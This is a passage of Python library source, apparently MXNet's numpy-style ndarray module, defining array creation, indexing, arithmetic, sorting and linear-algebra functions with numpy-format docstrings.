                  _np.float64:'float64', _np.bool_:'bool_', bool:'bool', int:'int64', float:'float64'}
    if order != 'C':
        raise NotImplementedError("Only support C-order at this moment")
    if subok:
        raise NotImplementedError("Creating array by using sub-class is not supported at this moment")
    if shape is not None:
        raise NotImplementedError("Assigning new shape is not supported at this moment")
    try:
        dtype = dtype if isinstance(dtype, str) else dtype_list[dtype]
    except (KeyError, TypeError) as exc:
        # KeyError: dtype not in the supported table; TypeError: unhashable
        # dtype argument. Previously a bare `except:` swallowed *every*
        # exception here, including KeyboardInterrupt/SystemExit.
        raise NotImplementedError("Do not support this dtype at this moment") from exc
    return _npi.empty_like_fallback(prototype, dtype=dtype, order=order, subok=subok, shape=shape)
@set_module('mxnet.ndarray.numpy')
def arange(start, stop=None, step=1, dtype=None, ctx=None):
    """Return evenly spaced values within a given interval.

    Values are generated within the half-open interval ``[start, stop)``
    (in other words, the interval including `start` but excluding `stop`).
    For integer arguments the function is equivalent to the Python built-in
    `range` function, but returns an ndarray rather than a list.

    Parameters
    ----------
    start : number, optional
        Start of interval. The interval includes this value. The default
        start value is 0.
    stop : number
        End of interval. The interval does not include this value, except
        in some cases where `step` is not an integer and floating point
        round-off affects the length of `out`.
    step : number, optional
        Spacing between values. For any output `out`, this is the distance
        between two adjacent values, ``out[i+1] - out[i]``. The default
        step size is 1. If `step` is specified as a position argument,
        `start` must also be given.
    dtype : dtype
        The type of the output array. The default is `float32`.
    ctx : Context, optional
        Device context (default is the current default context).

    Returns
    -------
    arange : ndarray
        Array of evenly spaced values.
        For floating point arguments, the length of the result is
        ``ceil((stop - start)/step)``. Because of floating point overflow,
        this rule may result in the last element of `out` being greater
        than `stop`.

    Raises
    ------
    ValueError
        If both `start` and `stop` are None.
    ZeroDivisionError
        If `step` is 0.
    """
    # Validate before normalizing the arguments. The original code rewrote
    # `stop = start; start = 0` first, which made the "both None" check
    # unreachable (start was already 0 by the time it ran) and let
    # arange(None) pass stop=None to the backend.
    if start is None and stop is None:
        raise ValueError('start and stop cannot be both None')
    if step == 0:
        raise ZeroDivisionError('step cannot be 0')
    if dtype is None:
        dtype = 'float32'
    if ctx is None:
        ctx = current_context()
    if stop is None:
        # Single-argument form: arange(stop) counts from 0.
        stop = start
        start = 0
    if step is None:
        step = 1
    return _npi.arange(start=start, stop=stop, step=step, dtype=dtype, ctx=ctx)
@set_module('mxnet.ndarray.numpy')
def identity(n, dtype=None, ctx=None):
    """Return the `n` x `n` identity array.

    The result is a square array whose main diagonal is one and whose
    remaining elements are zero.

    Parameters
    ----------
    n : int
        Number of rows (and columns) of the output.
    dtype : data-type, optional
        Data-type of the output; ``numpy.float32`` when not given.
    ctx : Context, optional
        Device context (default is the current default context).

    Returns
    -------
    out : ndarray
        `n` x `n` array with ones on the main diagonal and zeros elsewhere.

    Raises
    ------
    TypeError
        If `n` is not an int.
    ValueError
        If `n` is negative.

    Examples
    --------
    >>> np.identity(3)
    array([[1., 0., 0.],
           [0., 1., 0.],
           [0., 0., 1.]])
    """
    if not isinstance(n, int):
        raise TypeError("Input 'n' should be an integer")
    if n < 0:
        raise ValueError("Input 'n' cannot be negative")
    if ctx is None:
        ctx = current_context()
    if dtype is None:
        dtype = _np.float32
    return _npi.identity(shape=(n, n), ctx=ctx, dtype=dtype)
# pylint: disable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def take(a, indices, axis=None, mode='raise', out=None):
    r"""Take elements from an array along an axis.

    With an `axis`, this behaves like fancy indexing along that axis:
    ``np.take(arr, indices, axis=3)`` is equivalent to
    ``arr[:,:,:,indices,...]``. Without an `axis`, `a` is treated as if
    it were flattened first.

    Parameters
    ----------
    a : ndarray
        The source array.
    indices : ndarray
        The indices of the values to extract. Scalars are also allowed.
    axis : int, optional
        The axis over which to select values. By default, the flattened
        input array is used.
    mode : {'clip', 'wrap'}, optional
        Out-of-bounds index policy:

        * 'clip' -- clip to the valid range (default)
        * 'wrap' -- wrap around

        With 'clip', indices that are too large are replaced by the last
        valid index along that axis; note this disables negative indexing.
    out : ndarray, optional
        Pre-allocated output of the appropriate shape and dtype.

    Returns
    -------
    out : ndarray
        Array of the same type as `a`.

    Notes
    -----
    Unlike the official `numpy.take`, only ndarray (or scalar ndarray)
    inputs are accepted.

    Examples
    --------
    >>> a = np.array([4, 3, 5, 7, 6, 8])
    >>> indices = np.array([0, 1, 4])
    >>> np.take(a, indices)
    array([4., 3., 6.])
    >>> np.take(a, np.array([[0, 1], [2, 3]]))
    array([[4., 3.],
           [5., 7.]])
    """
    if mode not in ('wrap', 'clip', 'raise'):
        raise NotImplementedError(
            "function take does not support mode '{}'".format(mode))
    if axis is None:
        # No axis: operate on the flattened view of `a`.
        return _npi.take(_npi.reshape(a, -1), indices, 0, mode, out)
    return _npi.take(a, indices, axis, mode, out)
# pylint: enable=redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def insert(arr, obj, values, axis=None):
    """Insert values along the given axis before the given indices.

    Parameters
    ----------
    arr : ndarray
        Input array.
    obj : int, slice or ndarray of int64
        Index or indices before which `values` is inserted. Multiple
        insertions are supported when `obj` is a single scalar or a
        one-element sequence (int32/int64 elements only).
    values : ndarray
        Values to insert into `arr`; converted to the dtype of `arr` if
        the types differ.
    axis : int, optional
        Axis along which to insert `values`. When None, `arr` is
        flattened first.

    Returns
    -------
    out : ndarray
        A copy of `arr` with `values` inserted; `insert` does not operate
        in place. When `axis` is None the result is flattened.

    Notes
    -----
    - For higher-dimensional inserts, ``obj=0`` behaves differently from
      ``obj=[0]``, just as ``arr[:,0,:] = values`` differs from
      ``arr[:,[0],:] = values``.
    - When `obj` is an ndarray, only int64 dtype is supported.

    Examples
    --------
    >>> a = np.array([[1, 1], [2, 2], [3, 3]])
    >>> np.insert(a, 1, np.array(5))
    array([1., 5., 1., 2., 2., 3., 3.])
    >>> np.insert(a, 1, np.array(5), axis=1)
    array([[1., 5., 1.],
           [2., 5., 2.],
           [3., 5., 3.]])
    """
    # Fast path: a plain Python scalar as the inserted value.
    if isinstance(values, numeric_types):
        if isinstance(obj, slice):
            stride = 1 if obj.step is None else obj.step
            return _npi.insert_slice(arr, val=values, start=obj.start,
                                     stop=obj.stop, step=stride, axis=axis)
        if isinstance(obj, integer_types):
            return _npi.insert_scalar(arr, val=values, int_ind=obj, axis=axis)
        if isinstance(obj, NDArray):
            return _npi.insert_tensor(arr, obj, val=values, axis=axis)
        # Unrecognized obj: fall through to the tensor path below, which
        # reports the unsupported type.
    if not isinstance(arr, NDArray):
        raise TypeError("'arr' can not support type {}".format(str(type(arr))))
    if not isinstance(values, NDArray):
        raise TypeError("'values' can not support type {}".format(str(type(values))))
    if isinstance(obj, slice):
        stride = 1 if obj.step is None else obj.step
        return _npi.insert_slice(arr, values, start=obj.start, stop=obj.stop,
                                 step=stride, axis=axis)
    if isinstance(obj, integer_types):
        return _npi.insert_scalar(arr, values, int_ind=obj, axis=axis)
    if isinstance(obj, NDArray):
        return _npi.insert_tensor(arr, values, obj, axis=axis)
    raise TypeError("'obj' can not support type {}".format(str(type(obj))))
#pylint: disable= too-many-arguments, no-member, protected-access
def _ufunc_helper(lhs, rhs, fn_array, fn_scalar, lfn_scalar, rfn_scalar=None, out=None):
    """Dispatch an element-wise binary operation to the right kernel.

    Performs numpy-like broadcasting where needed and picks the function
    to call based on the operand types.

    Parameters
    ----------
    lhs : ndarray or numeric value
        Left-hand operand.
    rhs : ndarray or numeric value
        Right-hand operand.
    fn_array : function
        Called when both operands are ndarrays.
    fn_scalar : function
        Called when both operands are numeric values.
    lfn_scalar : function
        Called when `lhs` is an ndarray and `rhs` is a numeric value.
    rfn_scalar : function, optional
        Called when `lhs` is numeric and `rhs` is an ndarray. When None
        the operation is assumed commutative and `lfn_scalar` is reused.
    out : ndarray, optional
        Pre-allocated output array.

    Returns
    -------
    mxnet.numpy.ndarray or scalar
        Result array or scalar.
    """
    from ...numpy import ndarray
    if isinstance(lhs, numeric_types):
        if isinstance(rhs, numeric_types):
            return fn_scalar(lhs, rhs, out=out)
        if rfn_scalar is None:
            # Commutative op: reuse the left-scalar kernel with swapped operands.
            return lfn_scalar(rhs, float(lhs), out=out)
        return rfn_scalar(rhs, float(lhs), out=out)
    if isinstance(rhs, numeric_types):
        return lfn_scalar(lhs, float(rhs), out=out)
    if isinstance(rhs, ndarray):
        return fn_array(lhs, rhs, out=out)
    raise TypeError('type {} not supported'.format(str(type(rhs))))
#pylint: enable= too-many-arguments, no-member, protected-access
@set_module('mxnet.ndarray.numpy')
def unique(ar, return_index=False, return_inverse=False, return_counts=False, axis=None):
    """Find the unique elements of an array.

    Returns the sorted unique elements of `ar`, plus up to three optional
    outputs:

    * the indices of the input array that give the unique values
    * the indices of the unique array that reconstruct the input array
    * the number of times each unique value appears in the input array

    Parameters
    ----------
    ar : ndarray
        Input array. Flattened unless `axis` is specified.
    return_index : bool, optional
        If True, also return the indices of `ar` (along the specified
        axis, or in the flattened array) that produce the unique array.
    return_inverse : bool, optional
        If True, also return the indices of the unique array that can be
        used to reconstruct `ar`.
    return_counts : bool, optional
        If True, also return the number of occurrences of each unique
        item in `ar`.
    axis : int or None, optional
        The axis to operate on. When None, `ar` is flattened. When an
        integer, the subarrays indexed by that axis are flattened and
        treated as elements of a 1-D array; see Notes. Default is None.

    Returns
    -------
    unique : ndarray
        The sorted unique values.
    unique_indices : ndarray, optional
        Indices of the first occurrences of the unique values in the
        original array. Only present when `return_index` is True.
    unique_inverse : ndarray, optional
        Indices to reconstruct the original array from the unique array.
        Only present when `return_inverse` is True.
    unique_counts : ndarray, optional
        Number of occurrences of each unique value in the original array.
        Only present when `return_counts` is True.

    Notes
    -----
    When an axis is given, the subarrays indexed by it are moved to the
    first dimension, flattened in C order, and then sorted and compared
    as whole elements, so the result is ordered lexicographically by
    first element.

    Differences from the official `numpy.unique`:

    - Only ndarray input is supported.
    - Object arrays and structured arrays are not supported.

    Examples
    --------
    >>> np.unique(np.array([1, 1, 2, 2, 3, 3]))
    array([1., 2., 3.])
    >>> a = np.array([[1, 0, 0], [1, 0, 0], [2, 3, 4]])
    >>> np.unique(a, axis=0)
    array([[1., 0., 0.],
           [2., 3., 4.]])
    >>> a = np.array([1, 2, 6, 4, 2, 3, 2])
    >>> u, indices = np.unique(a, return_index=True)
    >>> u
    array([1., 2., 3., 4., 6.])
    >>> indices
    array([0, 1, 5, 3, 2], dtype=int64)
    """
    result = _npi.unique(ar, return_index, return_inverse, return_counts, axis)
    # The backend returns a list when any optional output is requested;
    # surface it as a tuple to match numpy's convention.
    return tuple(result) if isinstance(result, list) else result
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def add(x1, x2, out=None, **kwargs):
    """Add arguments element-wise.

    Parameters
    ----------
    x1, x2 : ndarrays or scalar values
        Operands to add. When shapes differ they must be broadcastable to
        a common shape (which may be the shape of one or the other).
    out : ndarray
        Pre-allocated array to receive the result; must have the
        broadcast shape. A fresh array is allocated when omitted or None.

    Returns
    -------
    add : ndarray or scalar
        Element-wise sum of `x1` and `x2`; a scalar when both operands
        are scalars.

    Notes
    -----
    Automatic type promotion applies:

    * Two floating inputs produce the more precise floating type.
    * One floating input makes the result that floating type.
    * Two integer (including boolean) inputs are not supported yet.
    """
    # Addition is commutative, so no reflected scalar kernel is needed.
    return _ufunc_helper(x1, x2, _npi.add, _np.add, _npi.add_scalar,
                         rfn_scalar=None, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def subtract(x1, x2, out=None, **kwargs):
    """Subtract arguments element-wise.

    Parameters
    ----------
    x1, x2 : ndarrays or scalar values
        Operands to subtract. When shapes differ they must be
        broadcastable to a common shape (which may be the shape of one
        or the other).
    out : ndarray
        Pre-allocated array to receive the result; must have the
        broadcast shape. A fresh array is allocated when omitted or None.

    Returns
    -------
    subtract : ndarray or scalar
        Element-wise difference ``x1 - x2``; a scalar when both operands
        are scalars.

    Notes
    -----
    Automatic type promotion applies:

    * Two floating inputs produce the more precise floating type.
    * One floating input makes the result that floating type.
    * Two integer (including boolean) inputs are not supported yet.
    """
    # Subtraction is not commutative: a reflected kernel handles
    # scalar - ndarray.
    return _ufunc_helper(x1, x2, _npi.subtract, _np.subtract,
                         _npi.subtract_scalar,
                         rfn_scalar=_npi.rsubtract_scalar, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def multiply(x1, x2, out=None, **kwargs):
    """Multiply arguments element-wise.

    Parameters
    ----------
    x1, x2 : ndarrays or scalar values
        Operands to multiply. When shapes differ they must be
        broadcastable to a common shape (which may be the shape of one
        or the other).
    out : ndarray
        Pre-allocated array to receive the result; must have the
        broadcast shape. A fresh array is allocated when omitted or None.

    Returns
    -------
    out : ndarray or scalar
        Element-wise product of `x1` and `x2`; a scalar when both
        operands are scalars.

    Notes
    -----
    Automatic type promotion applies:

    * Two floating inputs produce the more precise floating type.
    * One floating input makes the result that floating type.
    * Two integer (including boolean) inputs are not supported yet.
    """
    # Multiplication is commutative, so no reflected scalar kernel is needed.
    return _ufunc_helper(x1, x2, _npi.multiply, _np.multiply,
                         _npi.multiply_scalar, rfn_scalar=None, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def divide(x1, x2, out=None, **kwargs):
    """Return a true division of the inputs, element-wise.

    Parameters
    ----------
    x1 : ndarray or scalar
        Dividend array.
    x2 : ndarray or scalar
        Divisor array.
    out : ndarray
        Pre-allocated array to receive the result; must have the
        broadcast shape. A fresh array is allocated when omitted or None.

    Returns
    -------
    out : ndarray or scalar
        Element-wise quotient; a scalar when both operands are scalars.

    Notes
    -----
    Automatic type promotion applies:

    * Two floating inputs produce the more precise floating type.
    * One floating input makes the result that floating type.
    * Two integer (including boolean) inputs produce a float32 result.
    """
    # Division is not commutative: a reflected kernel handles
    # scalar / ndarray.
    return _ufunc_helper(x1, x2, _npi.true_divide, _np.divide,
                         _npi.true_divide_scalar,
                         rfn_scalar=_npi.rtrue_divide_scalar, out=out)
@set_module('mxnet.ndarray.numpy')
def true_divide(x1, x2, out=None):
    """Return a true division of the inputs, element-wise.

    Unlike Python's traditional floor division, true division adjusts the
    output type to give the best answer regardless of the input types.

    Parameters
    ----------
    x1 : ndarray or scalar
        Dividend array.
    x2 : ndarray or scalar
        Divisor array.
    out : ndarray
        Pre-allocated array to receive the result; must have the
        broadcast shape. A fresh array is allocated when omitted or None.

    Returns
    -------
    out : ndarray or scalar
        Element-wise quotient; a scalar when both operands are scalars.

    Notes
    -----
    Automatic type promotion applies:

    * Two floating inputs produce the more precise floating type.
    * One floating input makes the result that floating type.
    * Two integer (including boolean) inputs produce a float32 result.
    """
    # Same dispatch as divide(): true division with a reflected kernel
    # for scalar / ndarray.
    return _ufunc_helper(x1, x2, _npi.true_divide, _np.divide,
                         _npi.true_divide_scalar,
                         rfn_scalar=_npi.rtrue_divide_scalar, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def mod(x1, x2, out=None, **kwargs):
    """Return the element-wise remainder of division.

    Parameters
    ----------
    x1 : ndarray or scalar
        Dividend array.
    x2 : ndarray or scalar
        Divisor array.
    out : ndarray
        Pre-allocated array to receive the result; must have the
        broadcast shape. A fresh array is allocated when omitted or None.

    Returns
    -------
    out : ndarray or scalar
        Element-wise remainder; a scalar when both operands are scalars.
    """
    # Modulo is not commutative: a reflected kernel handles
    # scalar % ndarray.
    return _ufunc_helper(x1, x2, _npi.mod, _np.mod, _npi.mod_scalar,
                         rfn_scalar=_npi.rmod_scalar, out=out)
@set_module('mxnet.ndarray.numpy')
def delete(arr, obj, axis=None):
    """Return a new array with sub-arrays along an axis deleted.

    For a one-dimensional array this returns the entries not returned by
    ``arr[obj]``.

    Parameters
    ----------
    arr : ndarray
        Input array.
    obj : slice, int or ndarray of ints
        Indices of sub-arrays to remove along the specified axis.
    axis : int, optional
        Axis along which to delete the subarray defined by `obj`. When
        None, `obj` is applied to the flattened array.

    Returns
    -------
    out : ndarray
        A copy of `arr` with the elements specified by `obj` removed;
        `delete` does not operate in place. When `axis` is None the
        result is flattened.

    Raises
    ------
    TypeError
        If `arr` is not an ndarray, or `obj` has an unsupported type.

    Examples
    --------
    >>> arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
    >>> np.delete(arr, 1, 0)
    array([[ 1.,  2.,  3.,  4.],
           [ 9., 10., 11., 12.]])
    >>> np.delete(arr, slice(None, None, 2), 1)
    array([[ 2.,  4.],
           [ 6.,  8.],
           [10., 12.]])
    >>> np.delete(arr, np.array([1,3,5]), None)
    array([ 1.,  3.,  5.,  7.,  8.,  9., 10., 11., 12.])
    """
    if not isinstance(arr, NDArray):
        raise TypeError("'arr' can not support type {}".format(str(type(arr))))
    if isinstance(obj, slice):
        stride = 1 if obj.step is None else obj.step
        return _npi.delete(arr, start=obj.start, stop=obj.stop,
                           step=stride, axis=axis)
    if isinstance(obj, integer_types):
        return _npi.delete(arr, int_ind=obj, axis=axis)
    if isinstance(obj, NDArray):
        return _npi.delete(arr, obj, axis=axis)
    raise TypeError("'obj' can not support type {}".format(str(type(obj))))
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def matmul(a, b, out=None):
    """Matrix product of two arrays.

    Parameters
    ----------
    a, b : ndarray
        Input arrays; scalars are not allowed.
    out : ndarray, optional
        Pre-allocated output whose shape matches the signature
        ``(n,k),(k,m)->(n,m)``. A fresh array is allocated when omitted
        or None.

    Returns
    -------
    y : ndarray
        The matrix product of the inputs; a scalar only when both inputs
        are 1-d vectors.

    Raises
    ------
    MXNetError
        If the last dimension of `a` does not match the second-to-last
        dimension of `b`, or if a scalar value is passed in.

    See Also
    --------
    tensordot :
        Sum products over arbitrary axes.
    dot :
        Alternative matrix product with different broadcasting rules.
    einsum :
        Einstein summation convention.

    Notes
    -----
    Behavior depends on the argument ranks:

    - Two 2-D arguments are multiplied like conventional matrices.
    - An N-D argument (N > 2) is treated as a stack of matrices in the
      last two indexes and broadcast accordingly.
    - A 1-D first argument is promoted by prepending a 1 to its shape;
      the prepended 1 is removed after multiplication.
    - A 1-D second argument is promoted by appending a 1 to its shape;
      the appended 1 is removed after multiplication.

    matmul differs from dot in two ways:

    - Multiplication by scalars is not allowed; use multiply instead.
    - Stacks of matrices broadcast as if the matrices were elements,
      respecting the signature ``(n,k),(k,m)->(n,m)``:

    >>> a = np.ones([9, 5, 7, 4])
    >>> c = np.ones([9, 5, 4, 3])
    >>> np.dot(a, c).shape
    (9, 5, 7, 9, 5, 3)
    >>> np.matmul(a, c).shape
    (9, 5, 7, 3)

    Examples
    --------
    For 2-D arrays it is the matrix product:

    >>> a = np.array([[1, 0],
    ...               [0, 1]])
    >>> b = np.array([[4, 1],
    ...               [2, 2]])
    >>> np.matmul(a, b)
    array([[4., 1.],
           [2., 2.]])

    For 2-D mixed with 1-D, the result is the usual:

    >>> b = np.array([1, 2])
    >>> np.matmul(a, b)
    array([1., 2.])

    Scalar multiplication raises an error:

    >>> np.matmul([1, 2], 3)
    Traceback (most recent call last):
    ...
    mxnet.base.MXNetError: ... : Multiplication by scalars is not allowed.
    """
    # The backend operator implements all rank-promotion and broadcasting
    # rules described above.
    return _npi.matmul(a, b, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def remainder(x1, x2, out=None):
    """Return the element-wise remainder of division.

    Alias of :func:`mod`.

    Parameters
    ----------
    x1 : ndarray or scalar
        Dividend array.
    x2 : ndarray or scalar
        Divisor array.
    out : ndarray
        Pre-allocated array to receive the result; must have the
        broadcast shape. A fresh array is allocated when omitted or None.

    Returns
    -------
    out : ndarray or scalar
        Element-wise remainder; a scalar when both operands are scalars.
    """
    # Same dispatch as mod(): reflected kernel handles scalar % ndarray.
    return _ufunc_helper(x1, x2, _npi.mod, _np.mod, _npi.mod_scalar,
                         rfn_scalar=_npi.rmod_scalar, out=out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def power(x1, x2, out=None, **kwargs):
    """Raise first array elements to powers from the second array, element-wise.

    Parameters
    ----------
    x1 : ndarray or scalar
        The bases.
    x2 : ndarray or scalar
        The exponents.
    out : ndarray
        Pre-allocated array to receive the result; must have the
        broadcast shape. A fresh array is allocated when omitted or None.

    Returns
    -------
    out : ndarray or scalar
        Bases in `x1` raised to the exponents in `x2`; a scalar when both
        operands are scalars.
    """
    # Exponentiation is not commutative: a reflected kernel handles
    # scalar ** ndarray.
    return _ufunc_helper(x1, x2, _npi.power, _np.power, _npi.power_scalar,
                         rfn_scalar=_npi.rpower_scalar, out=out)
@set_module('mxnet.ndarray.numpy')
def argsort(a, axis=-1, kind=None, order=None):
    """Return the indices that would sort an array.

    Performs an indirect sort along `axis` and returns an array of
    indices of the same shape as `a` that index data along that axis in
    sorted order.

    Parameters
    ----------
    a : ndarray
        Array to sort.
    axis : int or None, optional
        Axis along which to sort; -1 (the last axis) by default. When
        None, the flattened array is used.
    kind : string, optional
        Accepted for compatibility; has no effect on the result.
    order : str or list of str, optional
        Not supported yet; raises NotImplementedError when not None.

    Returns
    -------
    index_array : ndarray, int
        Indices that sort `a` along `axis`. For 1-D input,
        ``a[index_array]`` yields a sorted `a`; in general,
        ``np.take_along_axis(a, index_array, axis=axis)`` always yields
        the sorted `a`.

    Notes
    -----
    Alternative sorting algorithms are not supported.

    Examples
    --------
    >>> x = np.array([3, 1, 2])
    >>> np.argsort(x)
    array([1, 2, 0])

    >>> x = np.array([[0, 3], [2, 2]])
    >>> ind = np.argsort(x, axis=0)  # sorts along first axis (down)
    >>> ind
    array([[0, 1],
           [1, 0]])
    >>> np.take_along_axis(x, ind, axis=0)  # same as np.sort(x, axis=0)
    array([[0, 2],
           [2, 3]])
    """
    if order is not None:
        raise NotImplementedError("order not supported here")
    # int64 indices so the output can feed take_along_axis directly.
    return _npi.argsort(data=a, axis=axis, is_ascend=True, dtype='int64')
@set_module('mxnet.ndarray.numpy')
def sort(a, axis=-1, kind=None, order=None):
    """Return a sorted copy of an array.

    Parameters
    ----------
    a : ndarray
        Array to be sorted.
    axis : int or None, optional
        Axis along which to sort; -1 (the last axis) by default. When
        None, the flattened array is used.
    kind : string, optional
        Accepted for compatibility; has no effect on the result.
    order : str or list of str, optional
        Not supported yet; raises NotImplementedError when not None.

    Returns
    -------
    sorted_array : ndarray
        Array of the same type and shape as `a`.

    Notes
    -----
    Alternative sorting algorithms are not supported.

    Examples
    --------
    >>> a = np.array([[1,4],[3,1]])
    >>> np.sort(a)                 # sort along the last axis
    array([[1, 4],
           [1, 3]])
    >>> np.sort(a, axis=None)      # sort the flattened array
    array([1, 1, 3, 4])
    >>> np.sort(a, axis=0)         # sort along the first axis
    array([[1, 1],
           [3, 4]])
    """
    if order is not None:
        raise NotImplementedError("order not supported here")
    return _npi.sort(data=a, axis=axis, is_ascend=True)
@set_module('mxnet.ndarray.numpy')
def tensordot(a, b, axes=2):
    r"""Compute tensor dot product along specified axes for arrays >= 1-D.

    Given two tensors `a` and `b`, and an ``(a_axes, b_axes)`` pair, sums
    the products of `a`'s and `b`'s elements over the axes specified by
    ``a_axes`` and ``b_axes``. The third argument may instead be a single
    non-negative integer ``N``, in which case the last ``N`` dimensions
    of `a` and the first ``N`` dimensions of `b` are summed over.

    Parameters
    ----------
    a, b : ndarray, len(shape) >= 1
        Tensors to "dot".
    axes : int or (2,) ndarray
        * integer_like: sum over the last N axes of `a` and the first N
          axes of `b` in order; the corresponding axis sizes must match.
        * (2,) ndarray: a pair of axis lists, the first applying to `a`,
          the second to `b`; both must have the same length.

    See Also
    --------
    dot, einsum

    Notes
    -----
    Three common use cases are:

    * ``axes = 0`` : tensor product :math:`a\otimes b`
    * ``axes = 1`` : tensor dot product :math:`a\cdot b`
    * ``axes = 2`` : (default) tensor double contraction :math:`a:b`

    For integer `axes`, the evaluation order pairs the -Nth axis of `a`
    with the 0th axis of `b` first, and the -1th axis of `a` with the
    Nth axis of `b` last. When summing over several axes that are not
    the trailing (leading) axes of `a` (`b`), give `axes` as two
    sequences of equal length, listing the axes to sum over in matching
    order.

    Examples
    --------
    >>> a = np.arange(60.).reshape(3,4,5)
    >>> b = np.arange(24.).reshape(4,3,2)
    >>> c = np.tensordot(a,b, axes=([1,0],[0,1]))
    >>> c.shape
    (5, 2)
    >>> c
    array([[ 4400.,  4730.],
           [ 4532.,  4874.],
           [ 4664.,  5018.],
           [ 4796.,  5162.],
           [ 4928.,  5306.]])
    """
    if _np.isscalar(axes):
        # Integer form: contract the trailing N axes of a with the
        # leading N axes of b.
        return _npi.tensordot_int_axes(a, b, axes)
    if len(axes) != 2:
        raise ValueError('Axes must consist of two arrays.')
    axes_a, axes_b = axes
    # Promote bare scalars to one-element tuples.
    if _np.isscalar(axes_a):
        axes_a = (axes_a,)
    if _np.isscalar(axes_b):
        axes_b = (axes_b,)
    if len(axes_a) != len(axes_b):
        raise ValueError('Axes length mismatch')
    return _npi.tensordot(a, b, axes_a, axes_b)
@set_module('mxnet.ndarray.numpy')
def histogram(a, bins=10, range=None, normed=None, weights=None, density=None):  # pylint: disable=too-many-arguments
    """Compute the histogram of a set of data.

    Parameters
    ----------
    a : ndarray
        Input data; the histogram is computed over the flattened array.
    bins : int or NDArray
        An int gives the number of equal-width bins in `range` (10 by
        default). An NDArray defines a monotonically increasing array of
        bin edges, including the rightmost edge, allowing non-uniform
        bin widths. String and array_like bins are not supported yet.
    range : (float, float)
        Lower and upper range of the bins; required when `bins` is an
        integer. Values outside the range are ignored. The first element
        must be less than or equal to the second.
    normed : bool, optional
        Not supported yet, coming soon.
    weights : array_like, optional
        Not supported yet, coming soon.
    density : bool, optional
        Not supported yet, coming soon.
    """
    # Reject the numpy options that have no backend support yet.
    if normed is True:
        raise NotImplementedError("normed is not supported yet...")
    if weights is not None:
        raise NotImplementedError("weights is not supported yet...")
    if density is True:
        raise NotImplementedError("density is not supported yet...")
    if isinstance(bins, numeric_types):
        # Integer bin count needs an explicit range.
        if range is None:
            raise NotImplementedError("automatic range is not supported yet...")
        return _npi.histogram(a, bin_cnt=bins, range=range)
    if isinstance(bins, (list, tuple)):
        raise NotImplementedError("array_like bins is not supported yet...")
    if isinstance(bins, str):
        raise NotImplementedError("string bins is not supported yet...")
    if isinstance(bins, NDArray):
        return _npi.histogram(a, bins=bins)
    raise ValueError("np.histogram fails with", locals())
@set_module('mxnet.ndarray.numpy')
def eye(N, M=None, k=0, dtype=_np.float32, **kwargs):
    """
    Return a 2-D array with ones on the diagonal and zeros elsewhere.

    Parameters
    ----------
    N : int
        Number of rows in the output.
    M : int, optional
        Number of columns in the output. If None, defaults to N.
    k : int, optional
        Index of the diagonal: 0 (the default) refers to the main
        diagonal, a positive value to an upper diagonal, and a negative
        value to a lower diagonal.
    dtype : data-type, optional
        Data-type of the returned array.

    Returns
    -------
    I : ndarray of shape (N,M)
        An array where all elements are equal to zero, except for the
        k-th diagonal, whose values are equal to one.
    """
    # 'order' is accepted by numpy but not supported here.
    _sanity_check_params('eye', ['order'], kwargs)
    ctx = kwargs.pop('ctx', current_context())
    ctx = current_context() if ctx is None else ctx
    return _npi.eye(N, M, k, ctx, dtype)
@set_module('mxnet.ndarray.numpy')
def linspace(start, stop, num=50, endpoint=True, retstep=False, dtype=None, axis=0, ctx=None):  # pylint: disable=too-many-arguments
    r"""
    Return evenly spaced numbers over a specified interval.

    Returns num evenly spaced samples, calculated over the interval
    [start, stop]. The endpoint of the interval can optionally be
    excluded.

    Parameters
    ----------
    start : real number
        The starting value of the sequence.
    stop : real number
        The end value of the sequence, unless endpoint is set to False.
        In that case, the sequence consists of all but the last of
        num + 1 evenly spaced samples, so that stop is excluded. Note
        that the step size changes when endpoint is False.
    num : int, optional
        Number of samples to generate. Default is 50. Must be non-negative.
    endpoint : bool, optional
        If True, stop is the last sample. Otherwise, it is not included.
        Default is True.
    retstep : bool, optional
        If True, return (samples, step), where step is the spacing between samples.
    dtype : dtype, optional
        The type of the output array. If dtype is not given, infer the data
        type from the other input arguments.
    axis : int, optional
        The axis in the result to store the samples. Relevant only if start or
        stop are array-like. By default (0), the samples will be along a new
        axis inserted at the beginning. Use -1 to get an axis at the end.

    Returns
    -------
    samples : ndarray
        There are num equally spaced samples in the closed interval
        `[start, stop]` or the half-open interval `[start, stop)`
        (depending on whether endpoint is True or False).
    step : float, optional
        Only returned if retstep is True
        Size of spacing between samples.

    See Also
    --------
    arange : Similar to `linspace`, but uses a step size (instead of the
             number of samples).

    Examples
    --------
    >>> np.linspace(2.0, 3.0, num=5)
    array([2.  , 2.25, 2.5 , 2.75, 3.  ])
    >>> np.linspace(2.0, 3.0, num=5, endpoint=False)
    array([2. , 2.2, 2.4, 2.6, 2.8])
    >>> np.linspace(2.0, 3.0, num=5, retstep=True)
    (array([2.  , 2.25, 2.5 , 2.75, 3.  ]), 0.25)

    Notes
    -----
    This function differs from the original `numpy.linspace
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.linspace.html>`_ in
    the following aspects:
    - `start` and `stop` do not support list, numpy ndarray and mxnet ndarray
    - axis could only be 0
    - There could be an additional `ctx` argument to specify the device, e.g. the i-th
      GPU.
    """
    if isinstance(start, (list, _np.ndarray, NDArray)) or \
            isinstance(stop, (list, _np.ndarray, NDArray)):
        raise NotImplementedError('start and stop only support int')
    if axis != 0:
        raise NotImplementedError("the function only support axis 0")
    if ctx is None:
        ctx = current_context()
    samples = _npi.linspace(start=start, stop=stop, num=num, endpoint=endpoint, ctx=ctx, dtype=dtype)
    if not retstep:
        return samples
    # Match numpy's step semantics: the divisor excludes the final sample
    # only when the endpoint is included.  Previously this was hard-coded
    # to (num - 1), which was wrong for endpoint=False and raised
    # ZeroDivisionError for num == 1.
    div = (num - 1) if endpoint else num
    step = (stop - start) / div if div > 0 else _np.nan
